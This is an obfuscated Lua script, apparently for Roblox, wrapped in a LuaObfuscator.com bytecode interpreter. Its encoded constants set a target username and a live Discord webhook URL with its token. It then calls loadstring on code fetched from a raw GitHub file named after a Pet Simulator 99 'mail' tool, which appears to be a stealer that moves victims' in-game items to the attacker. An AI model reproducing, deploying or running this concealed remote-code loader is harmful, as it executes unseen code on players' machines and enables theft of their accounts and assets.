--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \___
_/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.20) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (1==v18) then v21=nil;function v21(v31,v32,v33)if v33 then local v71=(v31/(((882 -(282 + 595)) -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v71-(v71%(569 -(367 + 201))) ;else local v72=(1639 -(1523 + 114))^(v32-(928 -(214 + 713))) ;return (((v31%(v72 + v72))>=v72) and (1 + 0)) or (0 + 0 + 0) ;end end v22=nil;v18=2;end if (7==v18) then function v30(v34,v35,v36)local v37=0;local v38;local v39;local v40;while true do if (v37==0) then v38=v34[1];v39=v34[2];v37=1;end if (v37==1) then v40=v34[3];return function(...)local v78=v38;local v79=v39;local v80=v40;local v81=v28;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v95=0,v86 do if (v95>=v80) then v84[v95-v80 ]=v85[v95 + 1 ];else v88[v95]=v85[v95 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do v90=v78[v82];v91=v90[1];if (v91<=8) then if (v91<=3) then if (v91<=1) then if (v91>0) then v88[v90[2]]=v90[3];else do return;end end elseif (v91==2) then do return;end else v88[v90[2]]();end elseif (v91<=5) then if (v91==4) then local v116=v90[2];local v117,v118=v81(v88[v116](v13(v88,v116 + 1 ,v90[3])));v83=(v118 + v116) -1 ;local v119=0;for v138=v116,v83 do local v139=0;while true do if (v139==0) then v119=v119 + 1 ;v88[v138]=v117[v119];break;end end end else v88[v90[2]]();end elseif (v91<=6) then v88[v90[2]]=v90[3];elseif (v91>7) then local v142=v90[2];local v143=v88[v90[3]];v88[v142 + 1 ]=v143;v88[v142]=v143[v90[4]];else v88[v90[2]]=v90[3]~=0 ;end elseif (v91<=12) then if (v91<=10) then if (v91>9) then local v122=v90[2];local v123=v88[v90[3]];v88[v122 + 1 ]=v123;v88[v122]=v123[v90[4]];else v88[v90[2]]=v90[3]~=0 ;end elseif (v91==11) then local v128=0;local v129;while true do if (0==v128) then v129=v90[2];v88[v129]=v88[v129](v13(v88,v129 + 1 ,v83));break;end end else v36[v90[3]]=v88[v90[2]];end elseif (v91<=14) then if (v91==13) then local v132=v90[2];local v133,v134=v81(v88[v132](v13(v88,v132 + 1 ,v90[3])));v83=(v134 + v132) -1 ;local v135=0;for v140=v132,v83 do local v141=0;while true do if (v141==0) then v135=v135 + 1 ;v88[v140]=v133[v135];break;end end end else v36[v90[3]]=v88[v90[2]];end elseif (v91<=15) then if ((v90[3]=="_ENV") or (v90[3]=="getfenv")) then v88[v90[2]]=v36;else v88[v90[2]]=v36[v90[3]];end elseif (v91>16) then if ((v90[3]=="_ENV") or (v90[3]=="getfenv")) then v88[v90[2]]=v36;else v88[v90[2]]=v36[v90[3]];end else local v151=v90[2];v88[v151]=v88[v151](v13(v88,v151 + 1 ,v83));end v82=v82 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==4) then function v25()local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(1068 -(68 + 997))) then if (v46==(1270 -(226 + (2283 -1239)))) then if (v45==(0 -0)) then return v47 * (117 -(32 + 15 + 70)) ;else local v106=0 + 0 ;while true do if (v106==(0 + 0)) then v46=958 -(892 + 65) ;v44=(0 -0) -0 ;break;end end end elseif (v46==(3783 -1736)) then return ((v45==((0 + 0) -0)) and (v47 * ((351 -(87 + 263))/(180 -(67 + 113))))) or (v47 * NaN) ;end return v8(v47,v46-(751 + 272) ) * (v44 + (v45/(2^((918 -(368 + 423)) -75)))) ;end if (v41==(0 + 0)) then v42=v24();v43=v24();v41=3 -2 ;end if (v41==((2998 -2044) -((820 -(10 + 8)) + 150))) then v46=v21(v43,56 -(134 -99) ,31);v47=((v21(v43,57 -25 )==(1 + 0)) and  -(998 -((1357 -(416 + 26)) + (261 -179)))) or (2 -1) ;v41=2 + 1 ;end if (v41==1) then v44=1 -0 ;v45=(v21(v43,1,1207 -(1069 + 118) ) * ((4 -2)^32)) + v42 ;v41=2;end end end v26=nil;function v26(v48)local v49=0;local v50;local v51;while true do if (v49==(1 + 0)) then v50=v3(v16,v19,(v19 + v48) -1 );v19=v19 + v48 ;v49=2;end if (v49==(0 -0)) then v50=nil;if  not v48 then local v98=438 -((603 -458) + 293) ;while true do if (v98==((253 + 177) -(44 + 386))) then v48=v24();if (v48==(1486 -(998 + 488))) then return "";end break;end end end v49=1 + 0 ;end if (v49==(3 + 0)) then return v6(v51);end if (v49==((2825 -2051) -(201 + 571))) then v51={};for v92=3 -2 , #v50 do v51[v92]=v2(v1(v3(v50,v92,v92)));end v49=1141 -(116 + 1022) ;end end end v18=5;end if (v18==6) then v29=nil;function v29()local v52=1384 -(746 + 638) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v52~=4) then else v61=nil;while true do if (v53~=2) then else local v99=0 + 0 ;while true do if (v99==1) then v53=4 -1 ;break;end if (v99==0) then v58=nil;v59=nil;v99=1;end end end if (4==v53) then while true do if (v54~=3) then else v61=nil;while true do local v112=0;local v113;while true do if (v112~=(341 -(218 + 123))) then else v113=0;while true do if (v113==1) then if (v55~=(1584 -(1535 + 46))) then else local v163=0;local v164;while true do if (v163~=(0 + 0)) then else v164=0;while true do if (v164==(0 + 0)) then local v172=560 -(306 + 254) ;while true do if (v172==(0 + 0)) then for v175=1,v24() do v57[v175-(1 -0) ]=v29();end return v59;end end end end break;end end end if (v55~=2) then else local v165=1467 -(899 + 568) ;local v166;local v167;while true do if (v165==(1 + 0)) then while true do if (v166~=(0 -0)) then else v167=0;while true do if (v167==(603 -(268 + 335))) then local v173=290 -(60 + 230) ;while true do if (v173~=0) then else for v181=1,v60 do local v182=572 -(426 + 146) ;local v183;local v184;local v185;while true do if (v182~=0) then else local v190=0 + 0 ;local v191;while true do if (0~=v190) then else v191=0;while true do if (v191~=0) then else v183=0;v184=nil;v191=1;end if (v191==(1457 -(282 + 1174))) then v182=812 -(569 + 242) ;break;end end break;end end end if (v182==(2 -1)) then v185=nil;while true do if (v183==1) then if (v184==(1 + 0)) then v185=v22()~=(1024 -(706 + 318)) ;elseif (v184==(1253 -(721 + 530))) then v185=v25();elseif (v184~=3) then else v185=v26();end v61[v181]=v185;break;end if (v183==0) then local v198=0;local v199;while true do if (v198==0) then v199=0;while true do if (v199==1) then v183=1;break;end if (v199==0) then local v208=1271 -(945 + 326) ;while true do if (v208==0) then v184=v22();v185=nil;v208=1;end if (v208~=1) then else v199=2 -1 ;break;end end end end break;end end end end break;end end end v59[3]=v22();v173=1 + 0 ;end if (v173~=(701 -(271 + 429))) then else v167=1;break;end end end if (v167~=(1 + 0)) then else for v177=1501 -(1408 + 92) ,v24() do local v178=0;local v179;while true do if (0==v178) then v179=v22();if (v21(v179,1087 -(461 + 625) ,1289 -(993 + 295) )==0) then local v186=0 + 0 ;local v187;local v188;local v189;while true do if (v186==1) then v189={v23(),v23(),nil,nil};if (v187==(0 + 0)) then local v200=0;local v201;while true do if (v200==(0 + 0)) then v201=0 + 0 ;while true do if ((0 + 0)~=v201) then else v189[532 -(406 + 123) ]=v23();v189[1773 -(1749 + 20) ]=v23();break;end end break;end end elseif (v187==1) then v189[3]=v24();elseif (v187==2) then v189[1 + 2 ]=v24() -(2^16) ;elseif (v187~=(1325 -(1249 + 73))) then else local v211=0 + 0 ;local v212;local v213;local v214;while true do if (v211~=(1146 -(466 + 679))) then else v214=nil;while true do if (v212~=(0 -0)) then else local v219=0;while true do if (v219==(2 -1)) then v212=1;break;end if (v219==0) then v213=0;v214=nil;v219=1901 -(106 + 1794) ;end end end if (v212~=1) then else while true do if (v213==0) then v214=0;while true do if (v214==0) then v189[3]=v24() -(2^(6 + 10)) ;v189[4]=v23();break;end end break;end end break;end end break;end if (v211~=0) then else v212=0;v213=nil;v211=1;end end end v186=1 + 1 ;end if (v186~=3) then else if (v21(v188,3,8 -5 )==(2 -1)) then v189[4]=v61[v189[4]];end v56[v177]=v189;break;end if (v186==2) then local v193=0;local v194;while true do if (v193~=(114 -(4 + 110))) then else v194=584 -(57 + 527) ;while true do if (v194~=1) then else v186=3;break;end if (v194~=(1427 -(41 + 1386))) then else local v206=103 -(17 + 86) ;while true do if (v206==0) then if (v21(v188,1 + 0 ,1)==(1 -0)) then v189[5 -3 ]=v61[v189[2]];end if (v21(v188,168 -(122 + 44) ,2 -0 )==(3 -2)) then v189[3 + 0 ]=v61[v189[1 + 2 ]];end v206=1 -0 ;end if (v206==(66 -(30 + 35))) then v194=1 + 0 ;break;end end end end break;end end end if ((1257 -(1043 + 214))~=v186) then else local v195=0;local v196;while true do if (v195==(0 -0)) then v196=1212 -(323 + 889) ;while true do if (v196==(0 -0)) then local v207=0;while true do if ((580 -(361 + 219))==v207) then v187=v21(v179,322 -(53 + 267) ,3);v188=v21(v179,4,6);v207=1 + 0 ;end if (v207~=1) then else v196=1;break;end end end if (v196==1) then v186=1;break;end end break;end end end end end break;end end end v55=416 -(15 + 398) ;break;end end break;end end break;end if (v165~=0) then else v166=982 -(18 + 964) ;v167=nil;v165=3 -2 ;end end end break;end if (v113==(0 + 0)) then if (v55==1) then local v168=0 + 0 ;local v169;local v170;while true do if (v168==1) then while true do if (v169==(850 -(20 + 830))) then v170=0 + 0 ;while true do if (v170==0) then local v174=0;while true do if ((127 -(116 + 10))==v174) then v170=1;break;end if (v174==(0 + 0)) then v59={v56,v57,nil,v58};v60=v24();v174=1 + 0 ;end end end if (v170==(1 + 0)) then v61={};v55=4 -2 ;break;end end break;end end break;end if (v168~=(0 -0)) then else v169=0;v170=nil;v168=1552 -(1126 + 425) ;end end end if (v55==(405 -(118 + 287))) then local v171=0;while true do if (v171~=(3 -2)) then else v58={};v55=1;break;end if ((1121 -(118 + 1003))~=v171) then else v56={};v57={};v171=2 -1 ;end end end v113=1;end end break;end end end break;end if (v54~=0) then else local v107=0;while true do if (v107~=(378 -(142 + 235))) then else v54=4 -3 ;break;end if (v107==0) then v55=0 + 0 ;v56=nil;v107=1;end end end if (v54==(978 -(553 + 424))) then local v108=0;local v109;while true do if (v108==(0 -0)) then v109=0;while true do if ((1 + 0)~=v109) then else v54=2;break;end if (v109==0) then local v153=0 + 0 ;while true do if ((1 + 0)==v153) then v109=1 + 0 ;break;end if ((0 + 0)==v153) then v57=nil;v58=nil;v153=1;end end end end break;end end end if (v54~=(4 -2)) then else local v110=0 -0 ;local v111;while true do if (v110==0) then v111=0;while true do if (v111==0) then v59=nil;v60=nil;v111=1;end if (v111==(2 -1)) then v54=3;break;end end break;end end end end break;end if (v53==(1 + 2)) then v60=nil;v61=nil;v53=4;end if (v53==1) then local v100=0 -0 ;while true do if (v100==(753 -(239 + 514))) then v56=nil;v57=nil;v100=1 + 0 ;end if (v100==1) then v53=2;break;end end end if (v53~=0) then else local v101=0;while true do if (v101==0) then v54=0;v55=nil;v101=1;end if (v101==1) then v53=1330 -(797 + 532) ;break;end end end end break;end if (v52==0) then v53=0 + 0 ;v54=nil;v52=1;end if (v52==2) then v57=nil;v58=nil;v52=2 + 1 ;end if (v52==1) then v55=nil;v56=nil;v52=4 -2 ;end if (v52==(1205 -(373 + 829))) then v59=nil;v60=nil;v52=735 -(476 + 255) ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v62)if (v1(v62,2)==79) then local v73=0;while true do if (v73==0) then v20=v0(v3(v62,1,1));return "";end end else local v74=v2(v0(v62,16));if v20 then local v94=v5(v74,v20);v20=nil;return v94;else return v74;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v63=1130 -(369 + 761) ;local v64;local v65;local v66;local v67;while true do if (v63==0) then v64,v65,v66,v67=v1(v16,v19,v19 + 2 + 1 );v19=v19 + ((8 -2) -2) ;v63=1;end if (v63==(1 -0)) then return (v67 * (16777454 -((400 -(144 + 192)) + 174))) + (v66 * (9334 + 56202)) + (v65 * 256) + v64 ;end end end v25=nil;v18=4;end if (v18==2) then function v22()local v68=v1(v16,v19,v19);v19=v19 + 1 ;return v68;end v23=nil;function v23()local v69,v70=v1(v16,v19,v19 + (218 -(42 + 174)) );v19=v19 + 2 + 0 ;return (v70 * (213 + 43)) + v69 ;end v18=3;end end end v15("LOL!0B3O0003083O00557365726E616D65030C3O007269705F6C75636B69652O7303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132303439332O3433383433382O34353038362F375F52694742354F596438346D636F674F5445334349526F6E59544350376C55344B71506733464F4D66713655357A663362453472505332474C6B5F755274537955503403153O0073656C65637465644C6F6164696E675363722O656E03013O0032030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900103O0012013O00023O00120E3O00013O0012013O00043O00120E3O00033O0012013O00063O00120E3O00054O00073O00013O00120E3O00073O00120F3O00083O00120F000100093O00200A00010001000A0012010003000B4O000D000100034O00105O00022O00033O000100016O00017O00",v9(),...);
